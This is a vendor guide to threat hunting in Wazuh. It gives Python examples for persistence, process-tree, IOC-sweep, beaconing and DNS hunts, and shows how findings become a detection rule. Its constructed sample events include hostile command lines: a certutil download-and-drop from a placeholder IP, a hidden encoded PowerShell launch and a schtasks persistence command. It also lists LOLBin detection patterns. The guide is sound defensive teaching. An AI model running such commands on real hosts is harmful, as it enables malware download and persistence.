

Wazuh Threat Hunting Techniques

Threat hunting is proactive: instead of waiting for alerts, hunters form hypotheses about how an adversary might operate and search the data to prove or disprove them. This guide shows practical, hypothesis-driven hunting in Wazuh using queries, IOC sweeps and ATT&CK coverage.

Published 26 June 2026 · 12 min read · Codesecure SOC Engineering Team · SOC

Key Takeaways

  • Threat hunting is proactive search: hunters form hypotheses about adversary behaviour and query the data to confirm or refute them, rather than waiting for alerts.
  • Hypothesis-driven hunting is the core method: start from an ATT&CK technique or threat-intel lead, predict the evidence it would leave, then search for that evidence.
  • IOC sweeps use the Wazuh indexer and MISP feeds to retroactively search all historical data for indicators from new threat intelligence.
  • The data you need: rich endpoint telemetry (Sysmon, auditd), authentication logs, network and DNS data, and cloud activity, all searchable in the indexer.
  • Hunts feed detection: a successful hunt that finds a technique should become a permanent detection rule, turning one-time effort into lasting coverage.

What Threat Hunting Is and Is Not

Threat hunting is the proactive, hypothesis-driven search for adversaries that have evaded existing detections. It assumes that prevention and alerting are imperfect and that a sufficiently capable attacker may already be present, leaving traces that no rule happened to flag. The hunter's job is to find those traces before they become an incident. This is fundamentally different from alert triage, which is reactive and works the queue that detection rules produce.

It is also not the same as running a vulnerability scan or a compliance audit. Hunting looks for evidence of adversary activity in real telemetry, not for weaknesses or policy gaps. And it is not random log browsing: effective hunting is structured around a hypothesis, which keeps the search focused and the results meaningful. A hunt without a hypothesis tends to wander and rarely concludes.

Wazuh is well suited to hunting because the indexer holds searchable historical telemetry across endpoints, network, cloud and identity, and because rules and ATT&CK mappings give hunters a framework. The same platform that detects also lets you hunt and then convert hunt findings into new detections, closing the loop between proactive and reactive defence.

Hypothesis-Driven Hunting

The backbone of mature hunting is the hypothesis. A hypothesis is a specific, testable statement about how an adversary might be operating in your environment, usually derived from an ATT&CK technique, a piece of threat intelligence, or knowledge of your own attack surface. For example: an attacker who has gained a foothold would establish persistence through a new scheduled task or service. That hypothesis predicts specific evidence (scheduled-task or service-creation events) that you can then search for.

The method runs in four steps. Form the hypothesis from ATT&CK or intel. Predict the evidence the behaviour would leave in your telemetry: which log source, which event, what would distinguish malicious from benign. Search the data in the Wazuh indexer for that evidence, filtering aggressively to separate signal from routine activity. Conclude: either you find suspicious activity and pivot into investigation and response, or you find only benign activity, in which case you document the hunt (including the benign noise you had to exclude, which is exactly what a future rule must exclude too) and convert the search logic into a detection rule or scheduled query so the technique is covered automatically from then on.
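The persistence hypothesis above, carried through all four steps, as an added example (not Codesecure's or Wazuh's own code). It also covers the persistence hunt in the catalogue further down. It assumes Wazuh's standard Windows eventchannel decoding: Security event 4698 (scheduled task created) lands in data.win.system.eventID and data.win.eventdata.taskName, and Sysmon event 1 in data.win.eventdata.commandLine. The alert documents and the benign-prefix list are constructed for the example; tune both to your environment.

```python
"""Persistence hypothesis -> predicted evidence -> indexer query -> conclusion.

Added example, not Codesecure's or Wazuh's own code. Field names are
assumptions about the standard Wazuh Windows decoders; alerts are constructed.
"""
import re
from datetime import datetime, timedelta, timezone

NOW = datetime(2026, 6, 26, 12, 0, tzinfo=timezone.utc)  # fixed "now" so the run is reproducible

# Task paths owned by vendors that create tasks all day; the first pass of the hunt
# produces this list, and the eventual detection rule must exclude the same paths.
BENIGN_TASK_PREFIXES = ("\\Microsoft\\Windows\\", "\\Mozilla\\", "\\Google\\")

CREATE_RE = re.compile(r"(schtasks(\.exe)?\s.*/create|sc(\.exe)?\s+create)", re.I)


def hypothesis_query(hours=72, benign_prefixes=BENIGN_TASK_PREFIXES):
    """OpenSearch DSL body for wazuh-alerts-*: task or service creation in the last
    `hours`, vendor task paths excluded. POST it to /wazuh-alerts-*/_search or paste
    it into the dashboard's Dev Tools console."""
    should = [
        {"term": {"data.win.system.eventID": "4698"}},
        {"bool": {"must": [
            {"term": {"data.win.system.eventID": "1"}},
            {"query_string": {"default_field": "data.win.eventdata.commandLine",
                              "query": "(schtasks AND \\/create) OR (sc AND create)"}},
        ]}},
    ]
    must_not = [{"prefix": {"data.win.eventdata.taskName": p}} for p in benign_prefixes]
    return {"size": 500,
            "query": {"bool": {"filter": [{"range": {"timestamp": {"gte": f"now-{hours}h"}}}],
                               "should": should, "minimum_should_match": 1,
                               "must_not": must_not}},
            "sort": [{"timestamp": "desc"}]}


def field(doc, dotted):
    """Read a dotted path such as data.win.eventdata.taskName from a nested alert."""
    cur = doc
    for key in dotted.split("."):
        if not isinstance(cur, dict) or key not in cur:
            return None
        cur = cur[key]
    return cur


def matches_hypothesis(doc, now=NOW, hours=72, benign_prefixes=BENIGN_TASK_PREFIXES):
    """The same predicate as hypothesis_query, applied to one decoded alert."""
    if datetime.fromisoformat(doc["timestamp"]) < now - timedelta(hours=hours):
        return False
    task = field(doc, "data.win.eventdata.taskName") or ""
    if any(task.startswith(p) for p in benign_prefixes):
        return False
    event_id = field(doc, "data.win.system.eventID")
    if event_id == "4698":
        return True
    cmd = field(doc, "data.win.eventdata.commandLine") or ""
    return event_id == "1" and bool(CREATE_RE.search(cmd))


def run_hunt(docs, now=NOW, hours=72):
    """Conclude: return (timestamp, host, event id, task or command line) for each hit."""
    hits = []
    for d in docs:
        if matches_hypothesis(d, now, hours):
            e = d["data"]["win"]["eventdata"]
            hits.append((d["timestamp"], d["agent"]["name"], field(d, "data.win.system.eventID"),
                         e.get("taskName") or e.get("commandLine")))
    return sorted(hits)


def alert(ts, agent, event_id, **eventdata):
    return {"timestamp": ts, "agent": {"name": agent},
            "data": {"win": {"system": {"eventID": event_id}, "eventdata": eventdata}}}


SAMPLE_ALERTS = [  # constructed, not real telemetry
    alert("2026-06-25T03:12:00+00:00", "WS-042", "4698", subjectUserName="bob", taskName="\\Updater"),
    alert("2026-06-25T03:11:58+00:00", "WS-042", "1", image="C:\\Windows\\System32\\schtasks.exe",
          commandLine="schtasks /create /sc minute /mo 5 /tn Updater /tr C:\\Users\\Public\\svc.exe"),
    alert("2026-06-26T09:00:00+00:00", "WS-010", "4698", subjectUserName="SYSTEM",
          taskName="\\Microsoft\\Windows\\UpdateOrchestrator\\Reboot"),
    alert("2026-06-26T09:05:00+00:00", "WS-010", "1", image="C:\\Windows\\System32\\notepad.exe",
          commandLine="notepad.exe"),
    alert("2026-06-10T03:12:00+00:00", "WS-042", "4698", subjectUserName="bob", taskName="\\OldTask"),
]

if __name__ == "__main__":
    for hit in run_hunt(SAMPLE_ALERTS):
        print(hit)
```

Against the constructed alerts the hunt returns two hits, both on WS-042: the 4698 for the task named \Updater and the schtasks /create command that created it a few seconds earlier; the Microsoft-owned task, the notepad launch and the task created outside the 72-hour window are dropped. The exclusion list is the part that deserves the most care: every prefix you add to it is a place an attacker can hide a task name, so keep it short and specific rather than excluding whole vendors.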

Good hypotheses are specific enough to be testable and tied to behaviours that would actually matter. Anchoring hunts to the MITRE ATT&CK techniques most relevant to your threat model (the tactics a realistic adversary against your sector would use) keeps the programme focused and lets you track hunting coverage against the same ATT&CK matrix you use for detection.

Need a Managed SOC Built on Wazuh?

Codesecure runs Managed SOC on the Wazuh + TheHive + n8n + Cortex + MISP open source stack. 24x7 named analysts, fixed monthly retainer, no per-GB licensing. ISO/IEC 27001:2022 certified delivery across India, Singapore, UAE and Malaysia.

See SOC Services →

Hunting with Wazuh Search Queries

The practical work of hunting happens in the Wazuh dashboard's Discover view over the indexer, which accepts DQL or Lucene syntax against the wazuh-alerts-* indices (the same queries can be sent as OpenSearch DSL from the Dev Tools console or a script). Hunters query normalised fields (the decoded data, rule IDs, ATT&CK tags, user, host, process, source and destination) to slice the telemetry. Effective hunting queries combine filters to isolate the rare and suspicious: a particular process name with an unusual parent, connections to a specific port from hosts that should not make them, or authentication events filtered to off-hours and sensitive systems.

Several query patterns recur across hunts. Stacking and aggregation groups events by a field (process name, destination IP, user) and sorts by frequency, surfacing the rare outliers that hunting targets, since attacker tooling is usually uncommon in a population of normal activity. Pivoting follows a thread: from a suspicious process to its network connections to the user who launched it to that user's other activity. Time-bounding focuses a hunt on a window of interest, such as around a known event or a suspected compromise date.

Process-tree reconstruction is a high-value technique on endpoints. With Sysmon and auditd data, a hunter can rebuild the full parent-child chain of a suspicious process, revealing how it was launched and what it spawned, which is often where living-off-the-land attacks reveal themselves (for example a document handler spawning a script interpreter spawning a network tool). These chains rarely match a single signature but are clear to a hunter who knows what normal looks like.
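The two techniques above, stacking across the fleet and rebuilding a process tree, share the same Sysmon data, so here they are in one added example (not Codesecure's or Wazuh's own code); it also covers the rare-process and living-off-the-land hunts in the catalogue below. Field names follow how Wazuh decodes Sysmon Event ID 1 from the Windows eventchannel (data.win.eventdata.image, parentImage, processGuid, parentProcessGuid, commandLine); confirm them in your own Discover view before relying on them. Every record is constructed.

```python
"""Stacking and process-tree reconstruction over Sysmon process-creation events.

Added example, not Codesecure's or Wazuh's own code. Field names are assumptions
about Wazuh's Sysmon decoding; all records are constructed.
"""
from collections import defaultdict

EXPLORER = r"C:\Windows\explorer.exe"
WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CERTUTIL = r"C:\Windows\System32\certutil.exe"


def ev(agent, guid, parent_guid, image, parent_image, cmd):
    """One decoded Sysmon Event 1 as it appears in wazuh-alerts-*."""
    return {"agent": {"name": agent},
            "data": {"win": {"system": {"eventID": "1"},
                             "eventdata": {"processGuid": guid, "parentProcessGuid": parent_guid,
                                           "image": image, "parentImage": parent_image,
                                           "commandLine": cmd}}}}


SAMPLE = []
for i in range(1, 11):  # ten workstations doing ordinary things
    SAMPLE.append(ev(f"WS-{i:03d}", f"g{i}a", f"root{i}", EXPLORER, r"C:\Windows\System32\userinit.exe", "explorer.exe"))
    SAMPLE.append(ev(f"WS-{i:03d}", f"g{i}b", f"g{i}a", WORD, EXPLORER, '"WINWORD.EXE" /n invoice.docm'))
SAMPLE += [  # only on WS-007: Word -> PowerShell -> certutil -> dropped binary
    ev("WS-007", "g7c", "g7b", PS, WORD, "powershell -nop -w hidden -enc SQBFAFgA"),
    ev("WS-007", "g7d", "g7c", CERTUTIL, PS,
       r"certutil -urlcache -split -f http://203.0.113.5/a.txt C:\Users\Public\svc.exe"),
    ev("WS-007", "g7e", "g7d", r"C:\Users\Public\svc.exe", CERTUTIL, "svc.exe"),
]


def stack_by_image(docs, max_hosts=2):
    """Stacking: distinct hosts per executable, rarest first. Attacker tooling is
    usually the thing that runs on one or two machines out of the whole fleet."""
    hosts = defaultdict(set)
    for d in docs:
        hosts[d["data"]["win"]["eventdata"]["image"].lower()].add(d["agent"]["name"])
    ranked = sorted(hosts.items(), key=lambda kv: (len(kv[1]), kv[0]))
    return [(image, len(h)) for image, h in ranked if len(h) <= max_hosts]


def stack_query():
    """Server-side equivalent: a terms aggregation ordered by host cardinality.
    Assumes data.win.eventdata.image and agent.name are keyword fields."""
    return {"size": 0, "query": {"term": {"data.win.system.eventID": "1"}},
            "aggs": {"by_image": {"terms": {"field": "data.win.eventdata.image", "size": 5000,
                                            "order": {"hosts": "asc"}},
                                  "aggs": {"hosts": {"cardinality": {"field": "agent.name"}}}}}}


def index_by_guid(docs):
    return {d["data"]["win"]["eventdata"]["processGuid"]: d for d in docs}


def ancestry(by_guid, guid):
    """Walk parentProcessGuid links back to the root; returns basenames root-first.
    GUIDs rather than PIDs, because PIDs are reused within a boot."""
    chain, seen = [], set()
    while guid in by_guid and guid not in seen:
        seen.add(guid)
        e = by_guid[guid]["data"]["win"]["eventdata"]
        chain.append(e["image"].rsplit("\\", 1)[-1].lower())
        guid = e["parentProcessGuid"]
    return list(reversed(chain))


OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
NETWORK_LOLBINS = {"certutil.exe", "bitsadmin.exe", "curl.exe"}


def has_pattern(chain, *stages):
    """True if the chain contains one process from each stage, in order, root to leaf."""
    pos = 0
    for stage in stages:
        while pos < len(chain) and chain[pos] not in stage:
            pos += 1
        if pos == len(chain):
            return False
        pos += 1
    return True


def suspicious_chains(docs):
    """Every process whose ancestry reads document handler -> interpreter -> network LOLBin."""
    by_guid, hits, seen = index_by_guid(docs), [], set()
    for d in docs:
        chain = ancestry(by_guid, d["data"]["win"]["eventdata"]["processGuid"])
        if has_pattern(chain, OFFICE, INTERPRETERS, NETWORK_LOLBINS) and tuple(chain) not in seen:
            seen.add(tuple(chain))
            hits.append((d["agent"]["name"], chain))
    return hits


if __name__ == "__main__":
    print("rare executables:", stack_by_image(SAMPLE))
    for host, chain in suspicious_chains(SAMPLE):
        print(host, " -> ".join(chain))
```

Stacking surfaces three executables seen on a single host (powershell.exe, certutil.exe and the dropped svc.exe), and the tree walk on WS-007 reads explorer.exe -> winword.exe -> powershell.exe -> certutil.exe, the chain the paragraph describes. Neither certutil nor PowerShell is suspicious on its own, which is why the pattern check runs over the whole ancestry rather than a single event.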

IOC Sweeps and Threat Intelligence Hunting

Intelligence-driven hunting starts from indicators of compromise rather than behaviour. When new threat intelligence arrives (a fresh set of malicious IPs, domains, file hashes or TTPs tied to a campaign), the hunter sweeps historical telemetry to determine whether those indicators have ever appeared in the environment. This retroactive search is one of the highest-value hunts because it can reveal a past or ongoing compromise that detection missed at the time the indicator was unknown.

In the Codesecure stack, MISP aggregates threat-intel feeds and Wazuh checks incoming events against current indicators automatically, but the historical sweep is where hunting adds value. A hunter takes a new indicator set and queries the full retained history in the indexer for any match: a DNS lookup of a malicious domain, a connection to a known-bad IP, a file hash recorded by file integrity monitoring. That history can span months, because Wazuh has no per-GB licensing and the only limit is the storage and index retention you have sized for; if retention is shorter than the intelligence is old, the sweep cannot clear you for the earlier period and should say so. A hit triggers immediate investigation.
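A retroactive sweep of the kind described above, as an added example (not Codesecure's, MISP's or Wazuh's own code). The indicator set and every alert are constructed, and the field names are assumptions about the standard Wazuh decoders: data.srcip and data.dstip for network log decoders, data.win.eventdata.destinationIp (Sysmon 3), queryName (Sysmon 22), hashes (Sysmon 1) and syscheck.sha256_after for file integrity monitoring. It builds the single DSL query that covers every indicator type at once and applies the same logic locally, including the Sysmon quirk that packs several digests into one Hashes string.

```python
"""Retroactive IOC sweep across several Wazuh field families.

Added example, not Codesecure's, MISP's or Wazuh's own code. Indicators,
alerts and the documentation-range IP are constructed; field names are
assumptions about the standard Wazuh decoders.
"""
import hashlib

IOCS = {  # what one MISP event might hand you, grouped by attribute type
    "ip": {"203.0.113.5"},
    "domain": {"update-cdn.example"},
    "sha256": {hashlib.sha256(b"constructed sample payload").hexdigest()},
}

IOC_FIELDS = {  # where each indicator type can appear in wazuh-alerts-*
    "ip": ["data.srcip", "data.dstip", "data.win.eventdata.destinationIp"],
    "domain": ["data.win.eventdata.queryName"],
    "sha256": ["syscheck.sha256_after"],
}


def sweep_query(iocs, months=6):
    """One DSL body: a bool.should of `terms` clauses per field. Sysmon's Hashes field
    is 'SHA256=..,MD5=..' in a single string, so it needs a wildcard, not a term."""
    should = [{"terms": {f: sorted(values)}}
              for kind, values in iocs.items() for f in IOC_FIELDS[kind]]
    should += [{"wildcard": {"data.win.eventdata.hashes": {"value": f"*SHA256={h}*",
                                                          "case_insensitive": True}}}
               for h in iocs.get("sha256", ())]
    return {"size": 1000,
            "query": {"bool": {"filter": [{"range": {"timestamp": {"gte": f"now-{months}M"}}}],
                               "should": should, "minimum_should_match": 1}},
            "sort": [{"timestamp": "asc"}]}  # oldest first: the first hit bounds the exposure window


def field(doc, dotted):
    cur = doc
    for key in dotted.split("."):
        if not isinstance(cur, dict) or key not in cur:
            return None
        cur = cur[key]
    return cur


def sysmon_hashes(value):
    """'SHA256=AB..,MD5=CD..' -> {'sha256': 'ab..', 'md5': 'cd..'}"""
    out = {}
    for part in (value or "").split(","):
        if "=" in part:
            k, v = part.split("=", 1)
            out[k.strip().lower()] = v.strip().lower()
    return out


def sweep(docs, iocs):
    """Local equivalent of sweep_query: (timestamp, host, field, value) per match, oldest first."""
    wanted = {kind: {v.lower() for v in values} for kind, values in iocs.items()}
    hits = []
    for d in docs:
        for kind, fields in IOC_FIELDS.items():
            for f in fields:
                v = field(d, f)
                if isinstance(v, str) and v.lower() in wanted.get(kind, set()):
                    hits.append((d["timestamp"], d["agent"]["name"], f, v.lower()))
        digest = sysmon_hashes(field(d, "data.win.eventdata.hashes")).get("sha256")
        if digest in wanted.get("sha256", set()):
            hits.append((d["timestamp"], d["agent"]["name"], "data.win.eventdata.hashes", digest))
    return sorted(hits)


def exposure_window(hits):
    """Earliest and latest match plus the affected hosts: the scoping facts an IR lead asks for first."""
    if not hits:
        return None
    return hits[0][0], hits[-1][0], sorted({h[1] for h in hits})


def alert(ts, agent, fields):
    """Build a nested alert document from dotted field names."""
    doc = {"timestamp": ts, "agent": {"name": agent}}
    for dotted, value in fields.items():
        cur, parts = doc, dotted.split(".")
        for p in parts[:-1]:
            cur = cur.setdefault(p, {})
        cur[parts[-1]] = value
    return doc


H = next(iter(IOCS["sha256"]))
SAMPLE_ALERTS = [  # constructed, not real telemetry
    alert("2026-02-19T08:02:11+00:00", "WS-007", {"data.win.system.eventID": "22",
                                                 "data.win.eventdata.queryName": "update-cdn.example"}),
    alert("2026-02-19T08:02:12+00:00", "WS-007", {"data.win.system.eventID": "3",
                                                 "data.win.eventdata.destinationIp": "203.0.113.5"}),
    alert("2026-02-19T08:03:40+00:00", "WS-007", {"data.win.system.eventID": "1",
                                                 "data.win.eventdata.hashes": f"SHA256={H.upper()},MD5=0123456789ABCDEF0123456789ABCDEF"}),
    alert("2026-03-02T22:15:00+00:00", "SRV-DB01", {"syscheck.path": "C:\\Users\\Public\\svc.exe",
                                                   "syscheck.sha256_after": H}),
    alert("2026-06-20T10:00:00+00:00", "WS-002", {"data.win.system.eventID": "22",
                                                 "data.win.eventdata.queryName": "login.microsoftonline.com"}),
    alert("2026-06-20T10:00:01+00:00", "SRV-DB01", {"data.srcip": "10.0.0.5", "data.dstip": "10.0.0.20"}),
]

if __name__ == "__main__":
    hits = sweep(SAMPLE_ALERTS, IOCS)
    for h in hits:
        print(h)
    print("exposure window:", exposure_window(hits))
```

The sweep finds four matches: the DNS lookup, the connection and the process hash on WS-007 in February, and the same binary appearing on SRV-DB01 two weeks later, so the exposure window opens on 19 February and the scope is already two hosts before anyone has opened a ticket. The leading-wildcard clause on the Hashes field is expensive on large indices; if you sweep hashes often, a dedicated keyword field for the SHA256 extracted at ingest time is the better long-term fix.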

IOC sweeps should be systematic, not ad hoc. Maintaining a process where significant new intelligence automatically prompts a retrospective sweep ensures that the moment an indicator becomes known, your historical exposure to it is assessed. Cortex analyzers enrich any hit (reputation, related infrastructure, campaign attribution) so the hunter can quickly judge severity and scope.

Practical Hunt Techniques to Run

These hunts are concrete, repeatable and map to common adversary behaviour. They make a good starting catalogue for a Wazuh hunting programme.

  • Persistence hunt: review new scheduled tasks, services, run keys and startup entries for anything unexpected or recently created.
  • Living-off-the-land hunt: stack usage of LOLBins (PowerShell, certutil, rundll32, wmic) and inspect unusual command lines and parent processes.
  • Lateral movement hunt: look for remote service creation, anomalous SMB or RDP patterns, and new admin logins across multiple hosts.
  • Beaconing hunt: aggregate outbound connections by destination and look for regular, fixed-interval traffic indicating command and control.
  • Credential access hunt: search for LSASS access (Sysmon event 10 with lsass.exe as the target process and a non-system source), suspicious authentication patterns, and Kerberoasting indicators such as bursts of TGS requests (Windows event 4769) for service accounts using RC4 encryption (type 0x17).
  • Rare-process hunt: stack process names across the fleet and investigate the least common executables, where novel tooling hides.
  • DNS hunt: surface rare or newly-seen domains, long random-looking domain names and high-volume lookups suggesting tunnelling or exfiltration.
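Two of the catalogue hunts need arithmetic rather than a filter: the beaconing hunt (is the interval between connections suspiciously regular?) and the DNS hunt (does a name look machine-generated, and is it seen on only one host?). The following is an added example of both, not Codesecure's or Wazuh's own code. It assumes Wazuh's decoding of Sysmon Event 3 (data.win.eventdata.destinationIp and destinationPort) and Event 22 (queryName); every host, timestamp and name is constructed, and the IP is from a documentation-reserved range.

```python
"""Beaconing and random-looking-domain hunts over Sysmon network and DNS events.

Added example, not Codesecure's or Wazuh's own code. Field names are assumptions
about Wazuh's Sysmon decoding; all records are constructed.
"""
import math
import statistics
from collections import Counter, defaultdict
from datetime import datetime, timedelta, timezone

BASE = datetime(2026, 6, 25, 9, 0, tzinfo=timezone.utc)


def conn(agent, dst, port, at):
    return {"timestamp": at.isoformat(), "agent": {"name": agent},
            "data": {"win": {"system": {"eventID": "3"},
                             "eventdata": {"destinationIp": dst, "destinationPort": str(port)}}}}


def dns(agent, name):
    return {"agent": {"name": agent},
            "data": {"win": {"system": {"eventID": "22"}, "eventdata": {"queryName": name}}}}


# WS-007 reaches 203.0.113.5:443 every 60 s with a few seconds of jitter;
# WS-002 talks to a CDN at human, irregular intervals.
JITTER = [0, 2, -1, 3, -2, 1, 0, -3, 2, 1, -1, 0]
CONNS = [conn("WS-007", "203.0.113.5", 443, BASE + timedelta(seconds=60 * i + JITTER[i]))
         for i in range(12)]
CONNS += [conn("WS-002", "198.51.100.20", 443, BASE + timedelta(seconds=s))
          for s in (0, 7, 130, 131, 600, 1900, 1905, 4000)]

DNS = [dns("WS-007", "gq3k7x9z2mw1b4np.example")]                              # one host, high entropy
DNS += [dns(f"WS-{i:03d}", "login.microsoftonline.com") for i in range(1, 11)]  # fleet-wide, a real word
DNS += [dns(f"WS-{i:03d}", "d1k2f3g4h5j6l7m8.cloudfront.example") for i in range(1, 11)]  # random-looking but fleet-wide


def beacon_candidates(docs, min_events=8, max_cv=0.15, min_period=10, max_period=3600):
    """Group connections by (host, dst, port) and flag series whose inter-arrival
    time is stable: coefficient of variation <= max_cv and mean period in band."""
    series = defaultdict(list)
    for d in docs:
        e = d["data"]["win"]["eventdata"]
        series[(d["agent"]["name"], e["destinationIp"], e["destinationPort"])].append(
            datetime.fromisoformat(d["timestamp"]))
    out = []
    for (host, ip, port), times in series.items():
        if len(times) < min_events:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.fmean(gaps)
        if not min_period <= mean <= max_period:
            continue
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            out.append({"host": host, "dst": f"{ip}:{port}", "events": len(times),
                        "period_s": round(mean, 1), "cv": round(cv, 3)})
    return sorted(out, key=lambda r: r["cv"])


def entropy(s):
    """Shannon entropy in bits per character; 'microsoftonline' is about 3.2, random base36 near 4."""
    if not s:
        return 0.0
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def dns_candidates(docs, min_label=16, min_entropy=3.5, max_hosts=1):
    """Names whose longest label is long and high-entropy AND that few hosts resolve.
    The host-count test is what keeps CDN and telemetry hostnames out of the result."""
    hosts = defaultdict(set)
    for d in docs:
        name = d["data"]["win"]["eventdata"].get("queryName")
        if name:
            hosts[name.lower()].add(d["agent"]["name"])
    out = []
    for name, seen_on in hosts.items():
        label = max(name.split("."), key=len)
        if len(seen_on) <= max_hosts and len(label) >= min_label and entropy(label) >= min_entropy:
            out.append((name, len(seen_on), round(entropy(label), 2)))
    return sorted(out, key=lambda t: -t[2])


if __name__ == "__main__":
    print(beacon_candidates(CONNS))
    print(dns_candidates(DNS))
```

The beaconing check flags only WS-007 (twelve connections, a 60-second period, coefficient of variation about 0.05); the CDN traffic from WS-002 is far too irregular. The DNS check returns only gq3k7x9z2mw1b4np.example: the random-looking cloudfront name has the same entropy but is resolved fleet-wide, and microsoftonline is neither long nor random enough. Be aware that command-and-control frameworks with large configured jitter will exceed a CV of 0.15; for those, aggregate by destination over a longer window and look at the count and byte symmetry instead.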

Want Your Wazuh Deployment Tuned Properly?

Whether you run Wazuh in-house or want it operated for you, our SOC engineers handle rule tuning, detection engineering, threat hunting and response playbooks. Book a 30-minute scoping call with a named SOC lead.

Talk to a SOC Lead →

Building a Repeatable Hunting Programme

Threat hunting delivers the most value when it is a disciplined, recurring programme rather than an occasional heroic effort. A practical cadence assigns regular hunting time, draws hypotheses from a backlog tied to ATT&CK and current threat intelligence, documents each hunt (the hypothesis, the data examined, the queries, the conclusion) and tracks ATT&CK coverage so the programme demonstrably broadens over time. The documentation matters: a hunt that found nothing still has value as evidence and as a candidate for automation.

The single most important discipline is closing the loop. Every hunt that finds a detectable technique should produce a new Wazuh rule so the technique is caught automatically from then on. This is how a hunting programme compounds: each hunt either finds a threat or permanently widens automated coverage, so the reactive detection layer keeps getting stronger from proactive effort. Over time the hunters spend less effort on techniques that are now automated and more on genuinely novel hypotheses.
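Closing the loop in practice, as an added example (not Codesecure's or Wazuh's own code): the living-off-the-land chain a hunt might find (an Office application spawning a script interpreter) is distilled into a local rule, and the rule is checked against the finding and against a benign event before it ships. Assumptions: Wazuh's bundled Sysmon Event 1 rule tags alerts with the group sysmon_event1, decoded fields are addressed as win.eventdata.parentImage and win.eventdata.image in field matchers, PCRE2 matchers are enabled with type="pcre2", and local rule IDs start at 100000. The events are constructed.

```python
"""A hunt finding becomes a Wazuh local rule, checked before it ships.

Added example, not Codesecure's or Wazuh's own code. Group name, field
addressing and the 100000+ local rule range are assumptions about the
standard ruleset; events are constructed.
"""
import re
import xml.etree.ElementTree as ET

# Distilled from the chain the hunt found. PCRE2 syntax, which Wazuh accepts via
# type="pcre2" and which Python's re also understands, so the same pattern is tested here.
OFFICE_RE = r"(?i)\\(winword|excel|powerpnt|outlook)\.exe$"
INTERPRETER_RE = r"(?i)\\(powershell|pwsh|cmd|wscript|cscript|mshta)\.exe$"


def build_rule(rule_id=100100, level=12):
    """Render the local_rules.xml fragment for this finding."""
    return f"""<group name="local,sysmon,hunt,">
  <rule id="{rule_id}" level="{level}">
    <if_group>sysmon_event1</if_group>
    <field name="win.eventdata.parentImage" type="pcre2">{OFFICE_RE}</field>
    <field name="win.eventdata.image" type="pcre2">{INTERPRETER_RE}</field>
    <description>Hunt-derived: $(win.eventdata.parentImage) spawned $(win.eventdata.image)</description>
    <mitre><id>T1566.001</id><id>T1059</id></mitre>
  </rule>
</group>
"""


def parse_rule(xml_text):
    """Read the fragment back: proves it is well-formed XML and that every regex compiles."""
    rule = ET.fromstring(xml_text).find("rule")
    return {"id": rule.get("id"), "level": int(rule.get("level")),
            "if_group": rule.findtext("if_group"),
            "fields": [(f.get("name"), re.compile(f.text)) for f in rule.findall("field")],
            "mitre": [m.text for m in rule.findall("mitre/id")]}


def fires(rule, parent_groups, decoded):
    """Mimic the engine's two checks: the parent alert carries the if_group, and every
    <field> regex matches its decoded value (unanchored unless the pattern anchors)."""
    if rule["if_group"] not in parent_groups:
        return False
    return all(rx.search(decoded.get(name, "")) for name, rx in rule["fields"])


SYSMON1_GROUPS = {"windows", "sysmon", "sysmon_event1"}

FINDING = {  # constructed: the WS-007 chain from the hunt
    "win.eventdata.parentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
    "win.eventdata.image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "win.eventdata.commandLine": "powershell -nop -w hidden -enc SQBFAFgA",
}
BENIGN = {  # constructed: a user opening Word from the shell
    "win.eventdata.parentImage": r"C:\Windows\explorer.exe",
    "win.eventdata.image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
}

if __name__ == "__main__":
    rule = parse_rule(build_rule())
    print(build_rule())
    print("fires on finding:", fires(rule, SYSMON1_GROUPS, FINDING))
    print("fires on benign: ", fires(rule, SYSMON1_GROUPS, BENIGN))
```

Once the fragment passes this check, append it to /var/ossec/etc/rules/local_rules.xml, confirm with /var/ossec/bin/wazuh-logtest that a real Sysmon event from the hunt triggers rule 100100, and restart the manager. The rule is deliberately narrower than the hunt: the hunt looked for the full three-stage chain, but a two-stage rule (Office to interpreter) fires earlier in the intrusion and is cheap to tune, and the exclusions you discovered during the hunt go in as further `<field negate="yes">` matchers rather than by widening the regexes.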

Codesecure runs threat hunting as part of its managed SOC and as standalone engagements: structured hypothesis-driven hunts mapped to ATT&CK, systematic IOC sweeps against retained history, full documentation, and conversion of findings into durable detections in your Wazuh deployment. For teams hunting in-house, we deliver the methodology, query playbooks and a starter hunt catalogue with handover. ISO/IEC 27001:2022 certified delivery with named OSCP and CEH consultants.


Frequently Asked Questions

What is the difference between threat hunting and alert triage?

Alert triage is reactive: it works the queue of alerts that detection rules generate. Threat hunting is proactive: it assumes an adversary may already be present and undetected, forms hypotheses about how they would operate, and searches the telemetry for evidence before any alert fires. Both are needed, and a good hunt often produces new detection rules that improve future triage.

Do I need a dedicated threat hunter to hunt in Wazuh?

You need someone with the skills and dedicated time, but not necessarily a full-time role for a smaller organisation. Effective hunting requires knowledge of attacker techniques (ATT&CK), familiarity with your environment's normal behaviour, and query skills against the indexer. Many organisations get strong results from a recurring hunting cadence run by an experienced analyst or a managed partner rather than a dedicated headcount.

What is a hypothesis-driven hunt?

It is a hunt structured around a specific, testable statement about adversary behaviour, usually drawn from an ATT&CK technique or threat intelligence. You form the hypothesis, predict what evidence the behaviour would leave in your telemetry, search the data for that evidence, and conclude by either investigating a finding or converting the hunt into a permanent detection rule. The hypothesis keeps the hunt focused and conclusive.

What is an IOC sweep and why does it find real intrusions?

An IOC sweep is a retroactive search of historical telemetry for indicators of compromise from new threat intelligence (malicious IPs, domains, hashes). It frequently finds real intrusions because it searches for indicators that were unknown, and therefore undetected, at the time of the original activity. Because Wazuh retains history without per-GB licensing, sweeps can span months of data.

How does hunting improve my automated detection?

Through the close-the-loop discipline: every hunt that finds a detectable technique becomes a new Wazuh rule, so the technique is caught automatically afterwards. This means a hunting programme compounds. Each hunt either finds a threat or permanently widens automated coverage, steadily strengthening the reactive detection layer from proactive effort.

Can Codesecure run threat hunting on our environment?

